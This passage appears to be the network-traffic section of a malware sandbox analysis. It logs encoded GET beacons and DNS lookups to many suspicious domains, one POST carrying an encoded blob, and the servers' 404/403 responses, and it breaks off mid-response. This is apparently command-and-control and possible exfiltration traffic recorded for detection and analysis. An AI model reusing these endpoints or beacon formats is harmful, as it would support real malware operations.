            Source: global trafficHTTP traffic detected: GET /2c61/?TTv82Lg=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mg55aa.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /3osa/?kH=00U8ENLHk&TTv82Lg=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ie8mce.websiteConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /5965/?TTv82Lg=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.shrongcen.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /gwqo/?kH=00U8ENLHk&TTv82Lg=okHduu9bAgMM6c4GdEVgS1G+EVcXjBymZ/AEM3aFVKlZzziUwfhKvtqGWgkRboMd4eWK0/sAAMCd+0rGXOBNsjDOL2SA50vrXr2QK+Wy7YL6dLNwijbZiWqDBeKnevfe7g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skyinftech.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /fv92/?TTv82Lg=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.chowzen.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /xu8t/?kH=00U8ENLHk&TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.lecoinsa.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /lx5p/?TTv82Lg=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zhuan-tou.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /1134/?kH=00U8ENLHk&TTv82Lg=JRkLtFSsjC7w4kQ+Hghs1xAb5q91nLV93kknhelN5q6byYvj/Lx1HFkRT0D1h5CmR4/eZjEjURe15+EWWNTABSUQK+lvVBorOgW9ps6acI3n3nS9RerGGmYjuLu9ItylLw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kacotae.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /fhu0/?TTv82Lg=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.webuyfontana.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /wzcd/?kH=00U8ENLHk&TTv82Lg=FQzs5Gm41lAoc3qf/wWkUZspwwlJHXnDtyrZ3MD2xwlMLvR0+259MhI7Qpdm6NFMCSb0/6QDX0X/DlKTMMPY62KD9eqkA6d10wTN4I0Oir4qL663QSRv2YyvDfJ8itAe1g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.lunareafurniture.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficDNS traffic detected: DNS query: www.am1-728585.com
            Source: global trafficDNS traffic detected: DNS query: www.witoharmuth.com
            Source: global trafficDNS traffic detected: DNS query: www.magnoliahairandco.com
            Source: global trafficDNS traffic detected: DNS query: www.binpvae.lol
            Source: global trafficDNS traffic detected: DNS query: www.duzane.com
            Source: global trafficDNS traffic detected: DNS query: www.mg55aa.xyz
            Source: global trafficDNS traffic detected: DNS query: www.ie8mce.website
            Source: global trafficDNS traffic detected: DNS query: www.shrongcen.com
            Source: global trafficDNS traffic detected: DNS query: www.skyinftech.com
            Source: global trafficDNS traffic detected: DNS query: www.chowzen.top
            Source: global trafficDNS traffic detected: DNS query: www.lecoinsa.net
            Source: global trafficDNS traffic detected: DNS query: www.zhuan-tou.com
            Source: global trafficDNS traffic detected: DNS query: www.kacotae.com
            Source: global trafficDNS traffic detected: DNS query: www.webuyfontana.com
            Source: global trafficDNS traffic detected: DNS query: www.lunareafurniture.com
            Source: global trafficDNS traffic detected: DNS query: www.ffuel.network
            Source: unknownHTTP traffic detected: POST /jd4u/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.witoharmuth.comContent-Length: 208Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.witoharmuth.comReferer: http://www.witoharmuth.com/jd4u/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 54 54 76 38 32 4c 67 3d 69 62 55 76 61 56 39 4f 66 68 52 48 76 38 70 46 7a 4e 68 69 45 36 6f 6a 2f 55 6b 39 54 74 52 55 6e 45 72 41 59 4a 41 51 6d 32 43 2f 6f 30 47 72 54 50 71 4c 65 52 75 32 46 38 46 32 57 45 38 6f 30 49 55 52 6c 6b 6c 39 39 5a 5a 36 37 5a 6d 70 32 46 70 6f 2f 6b 71 58 79 72 6e 6d 33 4b 72 56 37 32 52 39 6a 6d 76 64 37 64 4e 4b 59 30 54 52 58 62 4d 34 78 58 34 77 34 63 54 51 48 56 5a 48 42 2b 54 54 4a 51 7a 41 71 37 4c 59 72 4e 6e 35 45 5a 4e 41 45 56 53 74 33 6a 6b 64 7a 46 64 4a 42 6c 63 45 58 69 32 44 31 7a 49 70 4b 52 69 6a 4a 42 59 77 46 4a 37 6e 66 53 45 55 44 47 43 50 52 41 75 37 41 6b 73 3d Data Ascii: TTv82Lg=ibUvaV9OfhRHv8pFzNhiE6oj/Uk9TtRUnErAYJAQm2C/o0GrTPqLeRu2F8F2WE8o0IURlkl99ZZ67Zmp2Fpo/kqXyrnm3KrV72R9jmvd7dNKY0TRXbM4xX4w4cTQHVZHB+TTJQzAq7LYrNn5EZNAEVSt3jkdzFdJBlcEXi2D1zIpKRijJBYwFJ7nfSEUDGCPRAu7Aks=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:20:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:21:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:21:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:21:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:21:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718007678.23121635146216586X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 10 Jun 2024 08:21:18 GMTX-Served-By: cache-dfw-kdfw8210035-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpqA3Os764o0I4PRjoOFA1EG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 